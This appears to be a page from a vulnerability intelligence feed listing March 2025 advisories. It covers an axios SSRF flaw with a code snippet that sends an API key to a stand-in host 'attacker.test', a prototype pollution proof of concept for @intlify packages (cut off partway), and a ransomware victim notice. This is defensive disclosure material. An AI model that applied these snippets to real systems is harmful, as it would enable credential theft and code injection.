
Threat and Vulnerability Intelligence Database

CVE-2025-27152

Description: axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.

CVSS: HIGH (7.7)

EPSS Score: 0.05%

Source: CVE
March 7th, 2025 (4 months ago)

CVE-2025-25617

Description: Incorrect Access Control in Unifiedtransform 2.X leads to Privilege Escalation, allowing teachers to create a syllabus.

EPSS Score: 0.02%

Source: CVE
March 7th, 2025 (4 months ago)
Description: Communications Data Group Falls Victim to Qilin Ransomware
Source: DarkWebInformer
March 7th, 2025 (4 months ago)
Description: Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

    import axios from "axios";

    const internalAPIClient = axios.create({
      baseURL: "http://example.test/api/v1/users/",
      headers: {
        "X-API-KEY": "1234567890",
      },
    });

    // const userId = "123";
    const userId = "http://attacker.test/";

    await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

- When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
- Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

Set up two simple HTTP servers:

    mkdir /tmp/server1 /tmp/server2
    echo "this is server1" > /tmp/server1/index....
Source: Github Advisory Database (NPM)
March 7th, 2025 (4 months ago)
Description: Vulnerability type: Prototype Pollution

Vulnerability Location(s):

    # v9.1
    node_modules/@intlify/message-resolver/index.js
    # v9.2 or later
    node_modules/@intlify/vue-i18n-core/index.js

Description: The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later) (previous versions might also be affected) is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with an Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) as the minimum consequence. Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

    // install the package with the latest version
    ~$ npm install @intlify/[email protected]
    // run the script mentioned below
    ~$ node poc.js
    // The expected output (if the code is still vulnerable) is below.
    // Note that the output may differ slightly from one function to another.
    Before Attack: {}
    After Attack: {"pollutedKey":123}

    // poc.js
    (async () => {
      const lib = await import('@intlify/message-resolver');
      var someObj = {}
      console.log("Before Attack: ", JSON.stringify({}.__proto__));
      try {
        // for mult...
Source: Github Advisory Database (NPM)
March 7th, 2025 (4 months ago)